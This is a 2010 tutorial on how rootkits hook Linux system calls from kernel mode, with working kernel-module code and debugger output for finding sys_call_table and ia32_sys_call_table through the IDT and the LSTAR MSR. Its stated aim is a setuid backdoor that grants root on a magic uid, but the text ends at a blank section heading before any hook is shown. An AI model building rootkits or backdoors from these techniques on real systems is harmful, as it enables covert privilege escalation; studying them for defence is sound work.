Kernel mode hooking [EN]





    Kernel Mode Hooking
        - oblique 2010


    0x01] Introduction
    0x02] Kernel mode hooking basic theory
    0x03] LKM - hello kernel
    0x04] Interrupt Descriptor Table (IDT)
    0x05] Get sys_call_table - Linux x86-32
    0x06] Model-Specific Registers (MSRs)
    0x07] Get sys_call_table - Linux x86-64
    0x08] Get ia32_sys_call_table - Linux x86-64
    0x09] Map to a writable memory
    0x0A] Hook a system call
    0x0B] Other ideas/methods
    0x0C] Greets
    0x0D] References



--[ 0x01 Introduction

    In this article I will show you the basic technique that rootkits use
    to hook system calls in kernel mode. I will deal only with Linux 2.6
    on x86-32 and x86-64. At the end we are going to hook the setuid
    system call so that, when it receives a "magic" uid as its argument,
    it gives root to the calling process.


--[ 0x02 Kernel mode hooking basic theory

    Modern operating systems on the x86 architecture use the well-known
    protected mode. In protected mode there are 4 privilege levels, 0 to
    3 (a.k.a. ring0 - ring3). The highest level (the least privileged) is
    userland (ring3) and the lowest level (the most privileged) is kernel
    mode (ring0). Applications run in userland and tell the kernel which
    system call to execute by putting its number in EAX (RAX on x86-64)
    and entering the kernel. On Linux x86-32 this is done with the
    software interrupt "int $0x80" and on Linux x86-64 with the "syscall"
    instruction. In both cases the CPU switches from ring3 to ring0 and
    jumps to system_call. Let's see the source code for x86-32:


    arch/x86/kernel/entry_32.S from [5]

    ...
    ...

    ENTRY(system_call)
        RING0_INT_FRAME
        pushl %eax
        CFI_ADJUST_CFA_OFFSET 4
        SAVE_ALL
        GET_THREAD_INFO(%ebp)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%ebp)
        jnz syscall_trace_entry
        cmpl $(nr_syscalls), %eax
        jae syscall_badsys
    syscall_call:
        call *sys_call_table(,%eax,4)
        movl %eax,PT_EAX(%esp)
    syscall_exit:
        LOCKDEP_SYS_EXIT
        DISABLE_INTERRUPTS(CLBR_ANY)
        TRACE_IRQS_OFF
        movl TI_flags(%ebp), %ecx
        testl $_TIF_ALLWORK_MASK, %ecx
        jne syscall_exit_work

    ...
    ...


    As you can see, the instruction "call *sys_call_table(,%eax,4)" calls
    the system call through an array of pointers (sys_call_table) indexed
    by the value of EAX. These values can be found in
    /usr/include/asm/unistd_32.h (for x86-32) and
    /usr/include/asm/unistd_64.h (for x86-64).
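
    To see these numbers at work from userland, here is a minimal sketch.
    It assumes a Linux system with glibc; raw_getpid is a name made up
    for this example. The syscall() wrapper loads the number into the
    register the kernel expects and enters the kernel for us:

```c
#include <sys/syscall.h>   /* SYS_getpid, the same value as __NR_getpid */
#include <unistd.h>        /* syscall(), getpid() */

/* Hypothetical helper: ask the kernel for our pid by system call number
 * instead of going through the getpid() library wrapper. */
long raw_getpid(void) {
    return syscall(SYS_getpid);
}
```

    Both paths end up at the same entry of sys_call_table, so
    raw_getpid() and getpid() should return the same value.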

    The same thing happens on x86-64, but there is one more array there,
    the ia32_sys_call_table, which is used by ia32_syscall. It serves
    32-bit binaries running on a 64-bit kernel.

    To hook a system call we have to replace its pointer in sys_call_table
    with a pointer to a function that we have created, which will call the
    real one (if needed). This cannot normally be done from a userland
    program because it has no access to kernel memory (actually it can be
    done via /dev/kmem or /dev/mem), so we will use a Loadable Kernel
    Module (LKM) to write kernel mode code. Many people know LKMs as
    hardware drivers that can be loaded from the shell with the commands
    modprobe or insmod. In fact an LKM is any module that is loaded into
    kernel memory and after that becomes part of the kernel.
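
    The idea of replacing a pointer in a table can be tried in plain
    userland C first. The sketch below is only a toy model: toy_table
    stands in for sys_call_table and every name in it is made up for
    this example.

```c
typedef long (*handler_t)(long);

static long real_double(long x) { return 2 * x; }   /* stands in for a real system call */
static long real_negate(long x) { return -x; }

/* Toy stand-in for sys_call_table: an array of function pointers. */
static handler_t toy_table[] = { real_double, real_negate };

/* What "call *sys_call_table(,%eax,4)" does, written in C. */
long toy_dispatch(unsigned long nr, long arg) {
    if (nr >= sizeof(toy_table) / sizeof(toy_table[0]))
        return -1;                      /* plays the role of syscall_badsys */
    return toy_table[nr](arg);
}

static handler_t saved_double;          /* the "real pointer" we keep */

static long hooked_double(long x) {
    return saved_double(x) + 1;         /* call the original, then alter the result */
}

/* Hook: remember the real pointer, then overwrite the table entry. */
void toy_hook(void)   { saved_double = toy_table[0]; toy_table[0] = hooked_double; }

/* Unhook: put the real pointer back. */
void toy_unhook(void) { toy_table[0] = saved_double; }
```

    After toy_hook(), callers of toy_dispatch(0, ...) reach hooked_double
    without noticing, and entry 1 is untouched. The rest of the article
    is about doing the same thing to the real table.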

    In kernel 2.4 hooking is very easy because sys_call_table is exported,
    so with "extern void *sys_call_table[];" you can get it and write to
    it. In kernel 2.6 the sys_call_table is no longer exported, and since
    2.6.16-rc1 it is also read-only. There are solutions to both problems,
    and there are 2 different ways to get the address of sys_call_table,
    which we are going to examine later.


--[ 0x03 LKM - hello kernel

    Before I continue I will show how we can write and compile an LKM (if
    you know how to do this just skip this section). An LKM does not have
    main() but has 2 other functions: init_module(), which is called when
    we load the module, and cleanup_module(), which is called when we (or
    the kernel) unload the module. init_module() returns an int: if it is
    negative the module is not loaded and an error is returned, if it is
    0 the module has been loaded successfully. Functions that take no
    arguments must be declared with void in the parentheses, because in C
    an empty parameter list is not a prototype and the kernel build warns
    about it. Another rule is that we have to declare the license of the
    module with the macro MODULE_LICENSE() (more info:
    http://kerneltrap.org/node/2991).


--file: hello_kernel.c--
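#include <linux/module.h>
#include <linux/kernel.h>   /* printk(), KERN_INFO */

/* Called when the module is loaded; returning 0 means success. */
int init_module(void) {
    printk(KERN_INFO "Hello kernel!\n");
    return 0;
}

/* Called when the module is unloaded. */
void cleanup_module(void) {
    printk(KERN_INFO "Bye bye kernel!\n");
}

MODULE_LICENSE("GPL");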
--EOF--
    
    
    In kernel 2.6 there is one more way to declare the init and cleanup
    functions and we can use any name we want.

    init function declaration:


    static int __init name_1(void) {
    }


    cleanup function declaration:


    static void __exit name_2(void) {
    }


    and then we do this:

    module_init(name_1);
    module_exit(name_2);


    A second example of hello_kernel.c:


--file: hello_kernel.c--
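#include <linux/module.h>
#include <linux/kernel.h>   /* printk(), KERN_INFO */
#include <linux/init.h>     /* __init, __exit, module_init(), module_exit() */

static int __init hello_init(void) {
    printk(KERN_INFO "Hello kernel!\n");
    return 0;
}

static void __exit hello_exit(void) {
    printk(KERN_INFO "Bye bye kernel!\n");
}

module_init(hello_init);
module_exit(hello_exit);
MODULE_LICENSE("GPL");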
--EOF--


    The kernel uses printk() to print a message. printk() has the same
    syntax as printf(), but the format string is first prefixed with the
    log level of the message. The available levels are: KERN_EMERG,
    KERN_ALERT, KERN_CRIT, KERN_ERR, KERN_WARNING, KERN_NOTICE, KERN_INFO,
    KERN_DEBUG, KERN_DEFAULT, KERN_CONT. To see these messages we have to
    run the command 'dmesg' (more info: 'man dmesg').

    To compile a module in kernel 2.6 we have to create a Makefile which
    sets the variable obj-m. In obj-m we list the names of our modules,
    but with the .o extension. In our case it is hello_kernel.o


--file: Makefile--
obj-m = hello_kernel.o
KDIR = /lib/modules/$(shell uname -r)/build

all:
	make -C $(KDIR) M=$(PWD) modules
clean:
	make -C $(KDIR) M=$(PWD) clean
--EOF-- 
    
    (more info: Documentation/kbuild/modules.txt from [5])

    -- NOTE --
    Don't forget that the basic syntax of Makefile is:

    <target>: [ <dependency > ]*
       [ <TAB> <command> <endl> ]+

    So in the 5th and 7th line we must have Tabs instead of spaces before
    "make". If you run 'make' and you get an error, check for this.
    -- END OF NOTE --

    After the creation of Makefile we have to run 'make' to compile the
    module.  Then we run as root 'insmod hello_kernel.ko' to load it and
    'rmmod hello_kernel' to unload it.


    oblique@gentoo ~/hello_kernel $ ls
    hello_kernel.c  Makefile
    oblique@gentoo ~/hello_kernel $ make
    make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hello_kernel modules
    make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
      CC [M]  /home/oblique/hello_kernel/hello_kernel.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /home/oblique/hello_kernel/hello_kernel.mod.o
      LD [M]  /home/oblique/hello_kernel/hello_kernel.ko
    make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
    oblique@gentoo ~/hello_kernel $ sudo insmod hello_kernel.ko
    oblique@gentoo ~/hello_kernel $ dmesg
    ...
    ...
    [60947.072113] Hello kernel!
    oblique@gentoo ~/hello_kernel $ sudo rmmod hello_kernel
    oblique@gentoo ~/hello_kernel $ dmesg
    ...
    ...
    [60947.072113] Hello kernel!
    [61105.613280] Bye bye kernel!
    oblique@gentoo ~/hello_kernel $

 
--[ 0x04 Interrupt Descriptor Table (IDT)

    The IDT is a table of the x86 architecture which can have up to 256
    entries of 3 gate types (task gate, interrupt gate, trap gate). The
    entry for "int $0x80" is a gate that userland is allowed to invoke
    (its DPL is 3). The table itself is stored in kernel memory and the
    kernel just loads its address into the IDT Register (IDTR) with the
    instruction LIDT. We can read this register with the instruction
    SIDT, which takes a memory address as its destination operand. The
    IDTR structure is:


    x86-32:

    BYTES   NAMES
    2       limit
    4       base


    x86-64:
    
    BYTES   NAMES
    2       limit
    8       base


    base is the address where the IDT starts, and by adding the limit to
    it we get the table's last memory address. We can express the IDTR
    with this C struct:


    struct idtr {
        unsigned short limit;
        void *base;
    } __attribute__ ((packed));


    -- NOTE --
    The "__attribute__ ((packed))" tells gcc not to insert padding
    between the members of the struct. In other words it will create a
    struct that is exactly as many bytes as we want.
    -- END OF NOTE --
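
    The effect of the attribute is easy to check in userland. This is a
    small sketch for gcc or clang; the struct and function names are made
    up for this example:

```c
#include <stddef.h>   /* offsetof, size_t */

struct idtr_padded {            /* same members, no packed attribute */
    unsigned short limit;
    void *base;
};

struct idtr_packed {            /* same layout as the struct idtr above */
    unsigned short limit;
    void *base;
} __attribute__ ((packed));

/* Byte offset of 'base' inside each variant, and the packed size. */
size_t padded_base_offset(void) { return offsetof(struct idtr_padded, base); }
size_t packed_base_offset(void) { return offsetof(struct idtr_packed, base); }
size_t packed_size(void)        { return sizeof(struct idtr_packed); }
```

    Without the attribute the compiler aligns base, so it no longer sits
    right after the 2 bytes of limit and SIDT would store the base at the
    wrong place inside our struct.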

    Now we know that the IDT starts at base and can hold 3 types of
    gates. An IDT descriptor has this structure:


    x86-32:

    BYTES   NAMES
    2       offset low bits (0..15)
    2       segment selector
    1       zero
    1       type & flags
    2       offset high bits (16..31)

    
    struct idt_descriptor {
        unsigned short offset_low;
        unsigned short selector;
        unsigned char zero;
        unsigned char type_flags;
        unsigned short offset_high;
    } __attribute__ ((packed));


    type_flags holds the type of the gate together with some flags. From
    this struct we only need offset_low and offset_high. To get the
    offset we write the following:

    offset = (offset_high<<16) | offset_low
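
    As a userland sketch of this formula (the struct is renamed
    idt_descriptor32 and gate_offset32 is a name made up here), with the
    cast that keeps the shift out of signed arithmetic:

```c
#include <stdint.h>

struct idt_descriptor32 {
    uint16_t offset_low;
    uint16_t selector;
    uint8_t  zero;
    uint8_t  type_flags;
    uint16_t offset_high;
} __attribute__ ((packed));

/* Join the two 16-bit halves. The cast widens offset_high before the
 * shift, so the result never passes through a signed int. */
uint32_t gate_offset32(const struct idt_descriptor32 *d) {
    return ((uint32_t)d->offset_high << 16) | d->offset_low;
}
```

    For example, offset_low = 0xfac4 and offset_high = 0xc157 give
    0xc157fac4.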


    x86-64:

    BYTES   NAMES
    2       offset low bits (0..15)
    2       segment selector
    1       zero
    1       type & flags
    2       offset middle bits (16..31)
    4       offset high bits (32..63)
    4       zero

    struct idt_descriptor {
        unsigned short offset_low;
        unsigned short selector;
        unsigned char zero1;
        unsigned char type_flags;
        unsigned short offset_middle;
        unsigned int offset_high;
        unsigned int zero2;
    } __attribute__ ((packed));

    Only offset_low, offset_middle and offset_high are needed here. The
    expression below gives the offset (in C, offset_high and offset_middle
    must be cast to a 64-bit type before shifting):

    offset = (offset_high<<32) | (offset_middle<<16) | offset_low
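
    The 64-bit case as a userland sketch (idt_descriptor64 and
    gate_offset64 are names made up for this example). Every part is
    widened to 64 bits before it is shifted, otherwise the shift by 32
    would happen in a 32-bit type:

```c
#include <stdint.h>

struct idt_descriptor64 {
    uint16_t offset_low;
    uint16_t selector;
    uint8_t  zero1;
    uint8_t  type_flags;
    uint16_t offset_middle;
    uint32_t offset_high;
    uint32_t zero2;
} __attribute__ ((packed));

/* Join the three parts of the handler address into one 64-bit value. */
uint64_t gate_offset64(const struct idt_descriptor64 *d) {
    return ((uint64_t)d->offset_high   << 32) |
           ((uint64_t)d->offset_middle << 16) |
            (uint64_t)d->offset_low;
}
```

    For example, offset_low = 0x64e0, offset_middle = 0x8104 and
    offset_high = 0xffffffff give 0xffffffff810464e0.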


--[ 0x05 Get sys_call_table - Linux x86-32

    There are 2 ways to obtain the sys_call_table: 1) from some files
    (/boot/System.map-(kernel_version), vmlinux, /proc/kallsyms), but
    these files may not even exist on the target. 2) from the IDT
    descriptor of interrupt 0x80.


    Method 1:

    oblique@gentoo ~ $ grep sys_call_table /boot/System.map-`uname -r`
    c1582160 R sys_call_table
    oblique@gentoo ~ $ nm /usr/src/linux/vmlinux | grep sys_call_table
    c1582160 R sys_call_table
    oblique@gentoo ~ $ grep sys_call_table /proc/kallsyms 
    oblique@gentoo ~ $ grep system_call /proc/kallsyms 
    c157fac4 T system_call

    -- NOTE --
    /usr/src/linux is the path of your kernel source. Also the addresses we
    got differ from system to system.
    -- END OF NOTE --


    As we can see, the first 2 commands gave us the address of
    sys_call_table. /proc/kallsyms doesn't contain it, but it has
    system_call. Let's check system_call with gdb.


    oblique@gentoo ~ $ gdb -q /usr/src/linux/vmlinux
    Reading symbols from /usr/src/linux-2.6.34-zen1-r2/vmlinux...done.
    (gdb) x/30i 0xc157fac4
    0xc157fac4:     push   %eax
    0xc157fac5:     cld    
    0xc157fac6:     push   $0x0
    0xc157fac8:     push   %fs
    0xc157faca:     push   %es
    0xc157facb:     push   %ds
    0xc157facc:     push   %eax
    0xc157facd:     push   %ebp
    0xc157face:     push   %edi
    0xc157facf:     push   %esi
    0xc157fad0:     push   %edx
    0xc157fad1:     push   %ecx
    0xc157fad2:     push   %ebx
    0xc157fad3:     mov    $0x7b,%edx
    0xc157fad8:     mov    %edx,%ds
    0xc157fada:     mov    %edx,%es
    0xc157fadc:     mov    $0xd8,%edx
    0xc157fae1:     mov    %edx,%fs
    0xc157fae3:     mov    $0xffffe000,%ebp
    0xc157fae8:     and    %esp,%ebp
    0xc157faea:     testl  $0x100001d1,0x8(%ebp)
    0xc157faf1:     jne    0xc157fbd8
    0xc157faf7:     cmp    $0x152,%eax
    0xc157fafc:     jae    0xc157fc21
    0xc157fb02:     call   *-0x3ea7dea0(,%eax,4)
    0xc157fb09:     mov    %eax,0x18(%esp)
    0xc157fb0d:     cli    
    0xc157fb0e:     mov    0x8(%ebp),%ecx
    0xc157fb11:     test   $0x1000feff,%ecx
    0xc157fb17:     jne    0xc157fbf8


    Here we can see the first 30 instructions of system_call (0xc157fac4).
    As I have shown before, there is a call that executes the system call
    from sys_call_table. This call is at address 0xc157fb02 and the next
    instruction is at 0xc157fb09. So 0xc157fb09 - 0xc157fb02 = 7 bytes.


    (gdb) x/7xb 0xc157fb02
    0xc157fb02:     0xff    0x14    0x85    0x60    0x21    0x58    0xc1


    The first 3 bytes are the opcode, ModRM and SIB bytes of the
    instruction, and the address of sys_call_table follows as a 32-bit
    little-endian value.


    (gdb) x/xw 0xc157fb02 + 3
    0xc157fb05:     0xc1582160
    

    So now we found the address of sys_call_table. I will not implement
    this method because I prefer the second.
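
    The 3 bytes in front of the address are not arbitrary. 0xff is the
    opcode, and the next 2 bytes are the ModRM and SIB bytes, which can
    be taken apart with a few shifts. The helpers below are a userland
    sketch with names made up for this example:

```c
#include <stdint.h>

/* ModRM byte: mod (bits 7-6), reg (bits 5-3), rm (bits 2-0). */
unsigned modrm_mod(uint8_t m) { return m >> 6; }
unsigned modrm_reg(uint8_t m) { return (m >> 3) & 7; }
unsigned modrm_rm(uint8_t m)  { return m & 7; }

/* SIB byte: scale (bits 7-6), index (bits 5-3), base (bits 2-0). */
unsigned sib_scale(uint8_t s) { return 1u << (s >> 6); }   /* 1, 2, 4 or 8 */
unsigned sib_index(uint8_t s) { return (s >> 3) & 7; }
unsigned sib_base(uint8_t s)  { return s & 7; }
```

    For 0x14 we get reg = 2 (the "call" variant of opcode 0xff) and
    rm = 4 (a SIB byte follows). For 0x85 we get scale 4, index 0 (EAX)
    and base 5, which together with mod = 0 means "32-bit displacement,
    no base register". That is exactly "call *disp32(,%eax,4)".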


    Method 2:

    As you should already know, interrupt handlers are registered in the
    IDT. When we execute the instruction "int $0x80" the CPU goes to the
    IDT, takes the descriptor of interrupt 0x80 and jumps to the offset
    stored in it, which is the address of system_call. So starting from
    that offset we can search for the pattern 0xff 0x14 0x85, and when we
    find it the next 4 bytes are the address of sys_call_table.


--file: get_sct.c--
#include <linux/module.h>

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));


void *get_sys_call_table(void) {
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    /* widen offset_high before shifting so the shift is not done in a signed int */
    system_call = (void*)(((unsigned long)idtd.offset_high<<16) | idtd.offset_low);

    printk(KERN_INFO "system_call: 0x%p", system_call);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void) {
    printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
    return 0;
}

static void __exit sct_exit(void) {
}

module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--


    Explanation:
    
    asm volatile("sidt %0" : "=m"(idtr));
    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    Here we get the IDTR and then with 'base + 0x80*sizeof(idtd)' we read
    the IDT descriptor of interrupt 0x80.


    system_call = (void*)(((unsigned long)idtd.offset_high<<16) | idtd.offset_low);
    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

    Here we calculate the address of system_call and then loop over the
    bytes that follow it, looking for the pattern. When we find it we
    skip its 3 bytes and return the value stored right after them.
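
    The search itself does not need the kernel and can be tested on a
    byte array. This is a userland sketch, not the module's code:
    find_table_disp32 is a name made up here, and unlike the loop above
    it takes the buffer length so that it never reads past the end.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scan 'len' bytes of code for the 3-byte pattern and store the 32-bit
 * little-endian value that follows it in *out. Returns 1 if found. */
int find_table_disp32(const unsigned char *code, size_t len,
                      const unsigned char pattern[3], uint32_t *out) {
    size_t i;

    for (i = 0; i + 7 <= len; i++) {    /* 3 pattern bytes + 4 address bytes */
        if (memcmp(code + i, pattern, 3) == 0) {
            const unsigned char *p = code + i + 3;
            /* assemble byte by byte: no unaligned or type-punned read */
            *out = (uint32_t)p[0]       | (uint32_t)p[1] << 8 |
                   (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
            return 1;
        }
    }
    return 0;
}
```

    Fed with the 7 bytes that gdb showed us (0xff 0x14 0x85 0x60 0x21
    0x58 0xc1) it yields 0xc1582160.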


    oblique@gentoo ~/hooking $ make
    make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
    make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
      CC [M]  /home/oblique/hooking/get_sct.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /home/oblique/hooking/get_sct.mod.o
      LD [M]  /home/oblique/hooking/get_sct.ko
    make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
    oblique@gentoo ~/hooking $ sudo insmod get_sct.ko 
    oblique@gentoo ~/hooking $ dmesg | tail
    ...
    ...
    [70274.087185] system_call: 0xc157fac4
    [70274.087190] sys_call_table: 0xc1582160
    oblique@gentoo ~/hooking $ sudo rmmod get_sct


--[ 0x06 Model-Specific Registers (MSRs)

    MSRs are registers that are used for very specific CPU jobs. To write
    to an MSR we use the instruction WRMSR and to read one we use the
    instruction RDMSR. These 2 instructions use 3 registers: EDX, EAX and
    ECX. ECX must hold the address (index) of the MSR we want to access.
    MSRs are 64-bit registers, so EDX carries the high 32 bits and EAX
    the low 32 bits. The values that we put in ECX can be found at [8].
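
    RDMSR and WRMSR themselves only run in ring0, but joining and
    splitting the two halves is plain arithmetic. A userland sketch
    (msr_join and msr_split are names made up for this example):

```c
#include <stdint.h>

/* RDMSR hands back the MSR as EDX (high half) and EAX (low half).
 * Both halves are unsigned, so widening them adds no sign bits. */
uint64_t msr_join(uint32_t eax, uint32_t edx) {
    return ((uint64_t)edx << 32) | eax;
}

/* The same value split back into the two halves that WRMSR expects. */
void msr_split(uint64_t value, uint32_t *eax, uint32_t *edx) {
    *eax = (uint32_t)value;
    *edx = (uint32_t)(value >> 32);
}
```

    Keeping the halves unsigned matters: a signed low half with bit 31
    set would be sign-extended when widened and would overwrite the high
    half with ones.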


--[ 0x07 Get sys_call_table - Linux x86-64

    The SYSCALL instruction is used to make x86-64 system calls and it
    uses the IA32_LSTAR MSR. According to [8] the address of IA32_LSTAR
    is 0xc0000082. On Linux this MSR holds the address of system_call.


    arch/x86/kernel/entry_64.S from [5]

    ...
    ...

    ENTRY(system_call)
            CFI_STARTPROC   simple
            CFI_SIGNAL_FRAME
            CFI_DEF_CFA     rsp,KERNEL_STACK_OFFSET
            CFI_REGISTER    rip,rcx
            SWAPGS_UNSAFE_STACK
    ENTRY(system_call_after_swapgs)
            movq    %rsp,PER_CPU_VAR(old_rsp)
            movq    PER_CPU_VAR(kernel_stack),%rsp
            ENABLE_INTERRUPTS(CLBR_NONE)
            SAVE_ARGS 8,1
            movq  %rax,ORIG_RAX-ARGOFFSET(%rsp)
            movq  %rcx,RIP-ARGOFFSET(%rsp)
            CFI_REL_OFFSET rip,RIP-ARGOFFSET
            GET_THREAD_INFO(%rcx)
            testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%rcx)
            jnz tracesys
    system_call_fastpath:
            cmpq $__NR_syscall_max,%rax
            ja badsys
            movq %r10,%rcx
            call *sys_call_table(,%rax,8)
            movq %rax,RAX-ARGOFFSET(%rsp)
    ret_from_sys_call:

    ...
    ...


    The "call *sys_call_table(,%rax,8)" calls the system call. Let's see
    system_call in gdb.


    oblique@sandbox64:~$ grep sys_call_table /boot/System.map-`uname -r`
    ffffffff81544380 R sys_call_table
    ffffffff8154dff8 r ia32_sys_call_table
    oblique@sandbox64:~$ grep system_call /boot/System.map-`uname -r`
    ffffffff81012060 T system_call
    ffffffff81012070 T system_call_after_swapgs
    ffffffff810120dc t system_call_fastpath
    oblique@sandbox64:~$ gdb -q /usr/src/linux/vmlinux
    Reading symbols from /usr/src/linux-2.6.32/vmlinux...done.
    (gdb) x/30i 0xffffffff81012060
    0xffffffff81012060:  swapgs 
    0xffffffff81012063:  data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
    0xffffffff81012070:  mov    %rsp,%gs:0xc6c8
    0xffffffff81012079:  mov    %gs:0xcbc8,%rsp
    0xffffffff81012082:  push   %rax
    0xffffffff81012083:  callq  *0x790a0f(%rip)        # 0xffffffff817a2a98
    0xffffffff81012089:  pop    %rax
    0xffffffff8101208a:  sub    $0x50,%rsp
    0xffffffff8101208e:  mov    %rdi,0x40(%rsp)
    0xffffffff81012093:  mov    %rsi,0x38(%rsp)
    0xffffffff81012098:  mov    %rdx,0x30(%rsp)
    0xffffffff8101209d:  mov    %rax,0x20(%rsp)
    0xffffffff810120a2:  mov    %r8,0x18(%rsp)
    0xffffffff810120a7:  mov    %r9,0x10(%rsp)
    0xffffffff810120ac:  mov    %r10,0x8(%rsp)
    0xffffffff810120b1:  mov    %r11,(%rsp)
    0xffffffff810120b5:  mov    %rax,0x48(%rsp)
    0xffffffff810120ba:  mov    %rcx,0x50(%rsp)
    0xffffffff810120bf:  mov    %gs:0xcbc8,%rcx
    0xffffffff810120c8:  sub    $0x1fd8,%rcx
    0xffffffff810120cf:  testl  $0x100001d1,0x10(%rcx)
    0xffffffff810120d6:  jne    0xffffffff8101222c
    0xffffffff810120dc:  cmp    $0x12a,%rax
    0xffffffff810120e2:  ja     0xffffffff810121b6
    0xffffffff810120e8:  mov    %r10,%rcx
    0xffffffff810120eb:  callq  *-0x7eabbc80(,%rax,8)
    0xffffffff810120f2:  mov    %rax,0x20(%rsp)
    0xffffffff810120f7:  mov    $0x1000feff,%edi
    0xffffffff810120fc:  mov    %gs:0xcbc8,%rcx
    0xffffffff81012105:  sub    $0x1fd8,%rcx

    
    The instruction that we are looking for is at 0xffffffff810120eb and
    it is 7 bytes long.


    (gdb) x/7xb 0xffffffff810120eb
    0xffffffff810120eb:     0xff    0x14    0xc5    0x80    0x43    0x54    0x81
    (gdb) x/xw 0xffffffff810120eb + 3
    0xffffffff810120ee:     0x81544380


    As you can see we have the sys_call_table address, but only its low
    32 bits: the CPU sign-extends this 32-bit displacement to 64 bits, so
    here the high bits are 0xffffffff. The pattern that we are looking
    for is not the same as on x86-32; now it is 0xff 0x14 0xc5.
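
    The sign extension can be written down directly. This is a userland
    sketch (extend_disp32 is a name made up here); it relies on gcc's
    behaviour when converting an out-of-range value to int32_t:

```c
#include <stdint.h>

/* Widen a 32-bit displacement the way the CPU does for
 * "call *disp32(,%rax,8)": by sign extension. */
uint64_t extend_disp32(uint32_t disp) {
    return (uint64_t)(int64_t)(int32_t)disp;
}
```

    For kernel addresses bit 31 of the displacement is set, so the result
    is the same as OR-ing with 0xffffffff00000000. The two only differ
    for displacements below 0x80000000, which stay unchanged under sign
    extension.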


--file: get_sct64.c--
#include <linux/module.h>

#define IA32_LSTAR  0xc0000082

void *get_sys_call_table(void) {
    void *system_call;
    unsigned char *ptr;
    unsigned int low, high;   /* unsigned: no sign extension when widened */
    int i;

    asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    system_call = (void*)(((unsigned long)high<<32) | low);

    printk(KERN_INFO "system_call: 0x%p", system_call);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void) {
    printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
    return 0;
}

static void __exit sct_exit(void) {
}

module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
    

    oblique@sandbox64:~/hooking$ sudo insmod get_sct64.ko
    oblique@sandbox64:~/hooking$ dmesg | tail
    ...
    ...
    [ 3027.560110] system_call: 0xffffffff81012060
    [ 3027.560110] sys_call_table: 0xffffffff81544380
    oblique@sandbox64:~/hooking$ sudo rmmod get_sct64


--[ 0x08 Get ia32_sys_call_table - Linux x86-64

    As we know, x86-32 binaries use interrupt 0x80 to make system calls,
    so to let the kernel run x86-32 binaries the kernel developers
    created ia32_syscall, which dispatches through ia32_sys_call_table.
    As we saw above, interrupts are defined in the IDT, so we already
    know the technique to get ia32_sys_call_table. ia32_syscall uses
    "call *ia32_sys_call_table(,%rax,8)" to call a system call, so the
    pattern that we are looking for is 0xff 0x14 0xc5.

--file: get_ia32_sct64.c--
#include <linux/module.h>

struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));


void *get_ia32_sys_call_table(void) {
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *ia32_syscall;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

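    /* widen every part to 64 bits before shifting, so nothing is sign-extended */
    ia32_syscall = (void*)(((unsigned long)idtd.offset_high<<32) |
                           ((unsigned long)idtd.offset_middle<<16) |
                           idtd.offset_low);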

    printk(KERN_INFO "ia32_syscall: 0x%p", ia32_syscall);

    for (ptr=ia32_syscall, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}

static int __init sct_init(void) {
    printk(KERN_INFO "ia32_sys_call_table: 0x%p", get_ia32_sys_call_table());
    return 0;
}

static void __exit sct_exit(void) {
}

module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--


    oblique@sandbox64:~/hooking$ grep ia32_syscall /boot/System.map-`uname -r`
    ffffffff810464e0 T ia32_syscall
    ffffffff8154ea80 r ia32_syscall_end
    oblique@sandbox64:~/hooking$ grep ia32_sys_call_table /boot/System.map-`uname -r`
    ffffffff8154dff8 r ia32_sys_call_table
    oblique@sandbox64:~/hooking$ sudo insmod get_ia32_sct64.ko 
    oblique@sandbox64:~/hooking$ dmesg | tail
    ...
    ...
    [ 5786.380128] ia32_syscall: 0xffffffff810464e0
    [ 5786.380128] ia32_sys_call_table: 0xffffffff8154dff8
    oblique@sandbox64:~/hooking$ sudo rmmod get_ia32_sct64


--[ 0x09 Map to a writable memory

